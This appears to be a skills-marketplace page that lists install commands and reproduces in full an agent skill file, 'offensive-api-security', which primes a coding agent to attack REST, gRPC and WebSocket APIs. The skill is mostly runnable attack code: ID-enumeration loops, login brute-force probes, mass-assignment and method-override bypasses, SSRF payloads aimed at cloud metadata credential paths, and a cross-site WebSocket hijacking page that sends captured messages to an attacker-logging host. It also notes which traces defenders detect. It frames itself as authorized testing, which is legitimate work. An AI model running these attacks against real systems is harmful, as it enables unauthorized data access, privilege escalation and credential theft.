Use Yaak
mountain-loop/yaak
A skill your agent uses when the user mentions Yaak, a Yaak workspace, or the yaak command, or asks to call, hit, or smoke test HTTP/REST endpoints, save or organize API requests for reuse or manual…
Comprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces.
$ npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-api-security --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .claude/skills && cp -r skills-src/Skills/api/offensive-api-security .claude/skills/offensive-api-security && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "offensive-api-security" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/api/offensive-api-security into .claude/skills/offensive-api-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-api-security", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/SnailSploit/Claude-Red/tree/main/Skills/api/offensive-api-securityType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-api-security --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .agents/skills && cp -r skills-src/Skills/api/offensive-api-security .agents/skills/offensive-api-security && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "offensive-api-security" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/api/offensive-api-security into .agents/skills/offensive-api-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-api-security", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-api-security --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/Skills/api/offensive-api-security .cursor/skills/offensive-api-security && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "offensive-api-security" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/api/offensive-api-security into .cursor/skills/offensive-api-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-api-security", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/SnailSploit/Claude-Red.git --path Skills/api/offensive-api-security--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-api-security --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/Skills/api/offensive-api-security .gemini/skills/offensive-api-security && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "offensive-api-security" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/api/offensive-api-security into .gemini/skills/offensive-api-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-api-security", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install SnailSploit/Claude-Red offensive-api-securityInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .github/skills && cp -r skills-src/Skills/api/offensive-api-security .github/skills/offensive-api-security && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "offensive-api-security" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/api/offensive-api-security into .github/skills/offensive-api-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-api-security", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-api-security --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/Skills/api/offensive-api-security .opencode/skills/offensive-api-security && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "offensive-api-security" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/api/offensive-api-security into .opencode/skills/offensive-api-security/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-api-security", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
offensive-api-securityComprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces.
Offensive API Security is an agent skill from SnailSploit/Claude-Red. Comprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces. Addresses the full OWASP API Security Top 10 2023 including BOLA/IDOR, broken authentication, excessive data exposure, rate limiting bypass, BFLA, mass assignment, SSRF, and security misconfiguration. Includes REST-specific attacks such as HTTP verb tampering, content-type switching, and parameter pollution. Covers gRPC exploitation through protobuf interception, reflection API enumeration, and metadata injection…
Its SKILL.md is about 5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Web application vulnerabilities, Penetration testing and gRPC and Protobuf. It works with gRPC, Burp Suite and Postman. The repository describes itself as: claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level… The licence is MIT.
10 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit 739512a. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curljqpython3From the folder's file list and the shell code blocks in SKILL.md.
Links to these hosts (documentation or services it may open):
portswigger.netgithub.comowasp.orggrpc.iodatatracker.ietf.orgdocs.mitmproxy.orgFrom URLs in SKILL.md, links to its own repository left out.
Names these keys or tokens, usually read from environment variables:
EXPIRED_TOKENPRE_PASSWORD_CHANGE_TOKENREGULAR_USER_TOKENREGULAR_TOKENSESSION_TOKENFrom names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Offensive API Security loads about 5k tokens when it runs. Until then it costs about 240 tokens; SKILL.md has 860 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from SnailSploit/Claude-Red at commit 739512a, republished under its MIT licence (© SnailSploit). 860 words, ~4,956 tokens.
.claude/skills/offensive-api-security/SKILL.md (or your agent's skills folder).You are conducting authorized security assessments against API-driven applications. This skill covers REST, gRPC, and WebSocket attack surfaces with emphasis on the OWASP API Security Top 10 2023. Every technique assumes you have written authorization and a defined scope. Your goal is to identify vulnerabilities that allow unauthorized data access, privilege escalation, or service disruption through API-layer attacks.
Broken Object Level Authorization (BOLA) is the most prevalent API vulnerability. You test it by capturing a legitimate request containing an object identifier and replaying it with identifiers belonging to other users or tenants.
GET /api/v1/users/1001/orders HTTP/1.1
Authorization: Bearer eyJhbGciOi...user_a_token
Host: target.example.comReplay with a different user ID while retaining the original token:
GET /api/v1/users/1002/orders HTTP/1.1
Authorization: Bearer eyJhbGciOi...user_a_token
Host: target.example.comAutomate IDOR testing across sequential and UUID-based identifiers:
# Sequential ID enumeration
for id in $(seq 1000 1050); do
status=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Authorization: Bearer $TOKEN_A" \
"https://target.example.com/api/v1/users/${id}/orders")
echo "ID: ${id} -> HTTP ${status}"
done# Test with collected UUIDs from other endpoints
while read -r uuid; do
resp=$(curl -s -H "Authorization: Bearer $TOKEN_A" \
"https://target.example.com/api/v1/documents/${uuid}")
echo "UUID: ${uuid} -> $(echo "$resp" | jq -r '.owner // "no_owner_field"')"
done < collected_uuids.txtTest across HTTP methods -- an endpoint may enforce authorization on GET but not on PUT or DELETE:
for method in GET PUT PATCH DELETE; do
curl -s -o /dev/null -w "${method} -> %{http_code}\n" \
-X "${method}" \
-H "Authorization: Bearer $TOKEN_A" \
-H "Content-Type: application/json" \
-d '{"status":"cancelled"}' \
"https://target.example.com/api/v1/users/1002/orders/5001"
doneTest authentication endpoints for credential stuffing resilience, token lifecycle weaknesses, and information leakage in API responses.
# Rapid credential testing -- probe for missing rate limits on login
for i in $(seq 1 100); do
code=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST -H "Content-Type: application/json" \
-d "{\"email\":\"test@example.com\",\"password\":\"attempt${i}\"}" \
"https://target.example.com/api/v1/auth/login")
echo "Attempt ${i}: HTTP ${code}"
[ "$code" = "429" ] && echo "Rate limit hit at attempt ${i}" && break
doneCheck for excessive data exposure by comparing full API responses against what the UI renders. Look for internal IDs, other users' emails, hashed passwords, role assignments, or PII the client never displays:
curl -s -H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/v1/users/me" | jq .Test token validation weaknesses:
# Expired token, post-password-change token, malformed bearer values
curl -s -o /dev/null -w "Expired: %{http_code}\n" \
-H "Authorization: Bearer $EXPIRED_TOKEN" \
"https://target.example.com/api/v1/users/me"
curl -s -o /dev/null -w "Pre-change: %{http_code}\n" \
-H "Authorization: Bearer $PRE_PASSWORD_CHANGE_TOKEN" \
"https://target.example.com/api/v1/users/me"
for val in "" "null" "undefined" "Bearer" "Bearer "; do
curl -s -o /dev/null -w "Value '${val}' -> %{http_code}\n" \
-H "Authorization: ${val}" \
"https://target.example.com/api/v1/users/me"
doneTest for Unrestricted Resource Consumption (API4:2023) by assessing whether the API enforces limits on request frequency, payload size, and response pagination.
# Measure rate limit headers across rapid requests
for i in $(seq 1 50); do
curl -s -D - -o /dev/null \
-H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/v1/search?q=test" 2>&1 | \
grep -iE "x-rate|retry-after|x-ratelimit"
sleep 0.1
done# Pagination abuse and large payload submission
curl -s -H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/v1/products?page=1&per_page=100000" | jq 'length'
python3 -c "
import json, sys
payload = {'name': 'A' * 1000000, 'tags': ['x'] * 10000}
sys.stdout.write(json.dumps(payload))
" | curl -s -o /dev/null -w "Large payload: %{http_code}\n" \
-X POST -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" -d @- \
"https://target.example.com/api/v1/products"Broken Function Level Authorization (BFLA) occurs when low-privilege users can invoke administrative API functions. Mass assignment exploits occur when the API binds client-supplied data directly to internal object properties.
# BFLA: Test admin endpoints with regular user token
admin_endpoints=(
"GET /api/v1/admin/users"
"POST /api/v1/admin/users"
"DELETE /api/v1/admin/users/1001"
"GET /api/v1/admin/config"
"PUT /api/v1/admin/config"
"GET /api/v1/internal/metrics"
)
for ep in "${admin_endpoints[@]}"; do
method=$(echo "$ep" | cut -d' ' -f1)
path=$(echo "$ep" | cut -d' ' -f2)
code=$(curl -s -o /dev/null -w "%{http_code}" \
-X "$method" -H "Authorization: Bearer $REGULAR_USER_TOKEN" \
"https://target.example.com${path}")
echo "${method} ${path} -> HTTP ${code}"
done# Mass assignment: inject properties that should not be user-controllable
curl -s -X PUT \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "Updated Name",
"role": "admin",
"is_admin": true,
"permissions": ["admin", "superuser"],
"account_type": "premium",
"credit_balance": 99999
}' \
"https://target.example.com/api/v1/users/me" | jq .APIs sometimes apply security controls only to expected HTTP methods or content types. You exploit this by sending requests with unexpected methods or by switching the serialization format.
# Verb tampering: test all methods against a restricted endpoint
for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE; do
code=$(curl -s -o /dev/null -w "%{http_code}" \
-X "$method" -H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/v1/admin/settings")
echo "${method} -> HTTP ${code}"
done# Method override headers -- bypass method-based WAF rules
curl -s -X POST \
-H "X-HTTP-Method-Override: DELETE" \
-H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/v1/users/1002"
curl -s -X POST \
-H "X-Method-Override: PUT" -H "X-HTTP-Method: PATCH" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"role":"admin"}' \
"https://target.example.com/api/v1/users/me"# Content-type switching and parameter pollution
curl -s -X POST -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin&password=test&role=admin" \
"https://target.example.com/api/v1/users"
curl -s -X POST -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><user><name>test</name><role>admin</role></user>' \
"https://target.example.com/api/v1/users"
# Parameter pollution via duplicate keys
curl -s -H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/v1/transfer?to=attacker&amount=100&to=victim"Server-Side Request Forgery through URL-accepting API parameters allows you to reach internal services or cloud metadata endpoints.
ssrf_payloads=(
"http://169.254.169.254/latest/meta-data/"
"http://metadata.google.internal/computeMetadata/v1/"
"http://127.0.0.1:8080/admin"
"http://[::1]:8080/"
"http://0x7f000001/"
"http://internal-service.local/"
)
for payload in "${ssrf_payloads[@]}"; do
echo "--- Testing: ${payload}"
curl -s -X POST -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d "{\"webhook_url\": \"${payload}\"}" \
"https://target.example.com/api/v1/integrations/webhook" | head -c 500
echo
doneTest SSRF through import/export and profile features:
curl -s -X POST -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"import_url": "http://169.254.169.254/latest/user-data"}' \
"https://target.example.com/api/v1/data/import"
curl -s -X PUT -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"avatar_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}' \
"https://target.example.com/api/v1/users/me/profile"gRPC services expose a different attack surface than REST. You use reflection to enumerate services, grpcurl to craft requests, and mitmproxy to intercept protobuf traffic.
# Enumerate services via gRPC reflection
grpcurl -plaintext target.example.com:50051 list
grpcurl -plaintext target.example.com:50051 describe myapp.UserService
grpcurl -plaintext target.example.com:50051 describe myapp.UserService.GetUser# Test BOLA on gRPC -- access another user's data with your token
grpcurl -plaintext \
-H "authorization: Bearer $TOKEN_A" \
-d '{"user_id": "1002"}' \
target.example.com:50051 myapp.UserService/GetUser
# Test admin methods with regular user credentials
grpcurl -plaintext \
-H "authorization: Bearer $REGULAR_TOKEN" \
-d '{}' \
target.example.com:50051 myapp.AdminService/ListAllUsersMetadata injection -- gRPC metadata headers can be exploited similarly to HTTP headers:
grpcurl -plaintext \
-H "authorization: Bearer $TOKEN" \
-H "x-forwarded-for: 127.0.0.1" \
-H "x-internal-service: true" \
-H "x-user-role: admin" \
-d '{}' \
target.example.com:50051 myapp.AdminService/GetConfigIntercept and modify gRPC traffic with mitmproxy:
# mitmproxy addon for gRPC inspection (save as grpc_inspector.py)
# Run: mitmproxy -s grpc_inspector.py --mode reverse:https://target:50051
from mitmproxy import http
class GrpcInspector:
def request(self, flow: http.HTTPFlow):
if flow.request.headers.get("content-type", "").startswith("application/grpc"):
print(f"[gRPC] {flow.request.method} {flow.request.path}")
for k, v in flow.request.headers.items():
if not k.startswith(":"):
print(f" Metadata: {k}: {v}")
def response(self, flow: http.HTTPFlow):
if flow.response and "grpc-status" in flow.response.headers:
print(f"[gRPC Response] Status: {flow.response.headers['grpc-status']}")
addons = [GrpcInspector()]WebSocket connections bypass many traditional HTTP security controls. You test origin validation, message injection, authentication persistence, and cross-site WebSocket hijacking.
# Origin validation testing with websocat
websocat -H "Origin: https://evil.example.com" "wss://target.example.com/ws/chat"
websocat "wss://target.example.com/ws/chat" # no origin
websocat -H "Origin: https://subdomain.target.example.com" "wss://target.example.com/ws/chat"#!/usr/bin/env python3
"""WebSocket message fuzzing and injection testing."""
import asyncio, websockets, json
async def test_ws_injection(url, token):
headers = {"Cookie": f"session={token}"}
async with websockets.connect(url, extra_headers=headers) as ws:
test_payloads = [
json.dumps({"type": "message", "content": "hello"}),
json.dumps({"type": "message", "content": "hello", "user_id": "1002"}),
json.dumps({"type": "admin_broadcast", "content": "injected"}),
json.dumps({"type": "subscribe", "channel": "../admin/notifications"}),
json.dumps({"type": "message", "content": "A" * 1000000}),
]
for payload in test_payloads:
await ws.send(payload)
try:
response = await asyncio.wait_for(ws.recv(), timeout=3)
print(f"Sent: {payload[:80]}\nRecv: {response[:200]}\n---")
except asyncio.TimeoutError:
print(f"Sent: {payload[:80]} -> No response\n---")
asyncio.run(test_ws_injection("wss://target.example.com/ws/chat", "SESSION_TOKEN"))Cross-Site WebSocket Hijacking (CSWSH) verification:
<!-- Host on attacker-controlled domain -- authorized testing only -->
<script>
var ws = new WebSocket("wss://target.example.com/ws/chat");
ws.onopen = function() {
console.log("[CSWSH] Connection opened -- origin validation missing");
ws.send(JSON.stringify({type: "message", content: "cswsh-test"}));
};
ws.onmessage = function(evt) {
console.log("[CSWSH] Received: " + evt.data);
fetch("https://attacker-log.example.com/log", {method: "POST", body: evt.data});
};
ws.onerror = function(e) {
console.log("[CSWSH] Connection failed -- origin may be validated");
};
</script>APIs that maintain multiple versions often have inconsistent security controls. Deprecated versions may lack patches applied to current versions.
# Enumerate API versions
versions=("v1" "v2" "v3" "v0" "v1-beta" "v2-beta" "internal" "latest" "dev" "staging")
for ver in "${versions[@]}"; do
code=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/${ver}/users/me")
[ "$code" != "404" ] && echo "Version '${ver}' -> HTTP ${code}"
done# Check for exposed documentation and debug endpoints
endpoints=(
"/swagger.json" "/swagger-ui/" "/openapi.json" "/api-docs"
"/graphql" "/graphiql" "/.well-known/openid-configuration"
"/actuator" "/actuator/env" "/actuator/health"
"/debug" "/trace" "/metrics" "/_profiler"
)
for ep in "${endpoints[@]}"; do
code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.example.com${ep}")
[ "$code" != "404" ] && [ "$code" != "000" ] && echo "${ep} -> HTTP ${code}"
done# CORS misconfiguration testing
curl -s -D - -o /dev/null \
-H "Origin: https://evil.example.com" -X OPTIONS \
"https://target.example.com/api/v1/users/me" 2>&1 | \
grep -iE "access-control|allow-origin|allow-credentials"
curl -s -D - -o /dev/null -H "Origin: null" \
"https://target.example.com/api/v1/users/me" 2>&1 | grep -i "access-control"
# Security header audit
curl -s -D - -o /dev/null "https://target.example.com/api/v1/health" 2>&1 | \
grep -iE "x-content-type|x-frame|strict-transport|content-security|x-powered-by|server:"When you run these tests, you leave artifacts that defenders and monitoring systems detect:
BOLA/IDOR probes generate sequences of requests with incrementing or random object IDs from a single session. API gateways log unusual access patterns across object identifiers. Anomaly detection flags accounts accessing resources outside their normal scope.
Rate limit testing produces burst traffic visible in access logs. HTTP 429 responses trigger SIEM alerts. Repeated authentication failures activate account lockout mechanisms.
Verb tampering and method override requests with unusual HTTP methods or override headers stand out in access logs. Security-conscious applications alert on method override header usage.
gRPC reflection enumeration is logged by interceptors. Calls to the reflection service from non-development IPs trigger alerts. Metadata injection attempts appear in gRPC access logs.
WebSocket testing generates connection attempts with unusual Origin headers logged at the load balancer. CSWSH attempts may trigger CSP violation reports.
SSRF payloads containing internal IPs or metadata URLs are flagged by WAFs. Outbound connections to unexpected destinations trigger network monitoring alerts.
Version probing creates 404 bursts across multiple path prefixes from a single source IP.
| Phase | Action | Tool |
|---|---|---|
| Reconnaissance | Collect API specs | Burp crawler, Swagger endpoints |
| Reconnaissance | gRPC service enumeration | grpcurl with reflection |
| Reconnaissance | WebSocket endpoint discovery | Burp Suite, DevTools |
| Authentication | Token lifecycle testing | curl, Burp Repeater |
| Authorization | BOLA/IDOR across objects | curl loops, Burp Intruder |
| Authorization | BFLA across roles | curl with multiple tokens |
| Input handling | Mass assignment | curl, Postman |
| Input handling | Content-type switching | curl with varied headers |
| Protocol | gRPC metadata injection | grpcurl |
| Protocol | gRPC protobuf interception | mitmproxy with addon |
| Protocol | WebSocket injection | websocat, Python websockets |
| Protocol | CSWSH verification | Custom HTML test page |
| Infrastructure | SSRF via URL parameters | curl, Burp Collaborator |
| Infrastructure | API versioning bypass | curl version enumeration |
| Infrastructure | Misconfiguration scan | curl, Burp scanner |
© SnailSploit, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in Skills/api/offensive-api-security of SnailSploit/Claude-Red.
Open the folder on GitHubat commit 739512a
Offensive API Security next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Offensive API Security this skillSnailSploit/Claude-Red | 7.3k | — | ~5k | Automated safety check: Pass | MIT | |
| Use Yaakmountain-loop/yaak | 19k | — | ~1.9k | Automated safety check: Pass | MIT | |
| User EnumerationNeoTheCapt/RedteamAgent | 142 | — | ~2.9k | Automated safety check: Pass | None | |
| Go ReviewSpecterOps/skills | 702 | — | ~2.1k | Automated safety check: Pass | Apache-2.0 | |
| Burp MCP Vuln Checklangbyyi/CyberStrikeAI-SRC | 134 | — | ~3.1k | Automated safety check: Pass | Apache-2.0 | |
| Idor Testingzebbern/claude-code-guide | 4.7k | 8 repos | ~3.1k | Automated safety check: Pass | MIT |
mountain-loop/yaak
A skill your agent uses when the user mentions Yaak, a Yaak workspace, or the yaak command, or asks to call, hit, or smoke test HTTP/REST endpoints, save or organize API requests for reuse or manual…
NeoTheCapt/RedteamAgent
Discover any interface (HTTP, WebSocket, GraphQL, gRPC, or other) that distinguishes between existing and non-existing users through any observable difference
SpecterOps/skills
Performs security review of arbitrary Go packages, including libraries, frameworks, CLIs, HTTP and gRPC services, and backend applications.
langbyyi/CyberStrikeAI-SRC
Automate low-impact web vulnerability verification through Burp MCP.
zebbern/claude-code-guide
This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references,"…
zhaoxuya520/reverse-skill
A skill your agent uses for authorized reverse engineering of custom binary protocols, Protobuf/gRPC, WebSocket frames, and PCAP-driven protocol recovery.
SnailSploit/Claude-Red
KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.
SnailSploit/Claude-Red
Practical offensive fuzzing methodology covering target identification, fuzzer selection (AFL++, libFuzzer, Honggfuzz, Boofuzz, syzkaller), harness writing, corpus curation, mutation strategies…
SnailSploit/Claude-Red
LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz…
SnailSploit/Claude-Red
Mobile (Android + iOS) application penetration testing methodology.
SnailSploit/Claude-Red
Wireless / 802.11 attack methodology for red team engagements and wireless security assessments.
SnailSploit/Claude-Red
WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…
Works with
Categories
Comprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces. Offensive API Security is an agent skill from SnailSploit/Claude-Red. Comprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces.
Offensive API Security fits situations like: tasks that involve Web application vulnerabilities; tasks that involve Penetration testing; tasks that involve gRPC and Protobuf.
Run `npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a claude-code`. Or copy the skill folder (Skills/api/offensive-api-security in SnailSploit/Claude-Red) into .claude/skills/offensive-api-security in your project. Claude Code loads it when a task matches its description.
Run `npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a codex`. Or copy the skill folder (Skills/api/offensive-api-security in SnailSploit/Claude-Red) into .agents/skills/offensive-api-security in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add SnailSploit/Claude-Red --skill offensive-api-security -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/offensive-api-security, .gemini/skills/offensive-api-security, .github/skills/offensive-api-security and .opencode/skills/offensive-api-security in your project.
Going by SKILL.md and its folder, Offensive API Security needs the command-line tools its instructions call (curl, jq and python3) and credentials named EXPIRED_TOKEN, PRE_PASSWORD_CHANGE_TOKEN, REGULAR_USER_TOKEN and REGULAR_TOKEN. Our summary lists: Python 3; A credential in EXPIRED_TOKEN; A credential in PRE_PASSWORD_CHANGE_TOKEN.
SKILL.md names 6 domains. As links in the text: portswigger.net, github.com, owasp.org, grpc.io, datatracker.ietf.org and docs.mitmproxy.org. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Offensive API Security is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 5k tokens (SKILL.md is roughly 20k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Offensive API Security: Use Yaak (mountain-loop/yaak, 19k stars), User Enumeration (NeoTheCapt/RedteamAgent, 142 stars), Go Review (SpecterOps/skills, 702 stars) and Burp MCP Vuln Check (langbyyi/CyberStrikeAI-SRC, 134 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
SnailSploit (a GitHub user) maintains it in SnailSploit/Claude-Red, which has 7,340 GitHub stars. The repository holds 10 skills in this directory. The repository was last updated on September 19, 2026.
Source: SnailSploit/Claude-Red on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.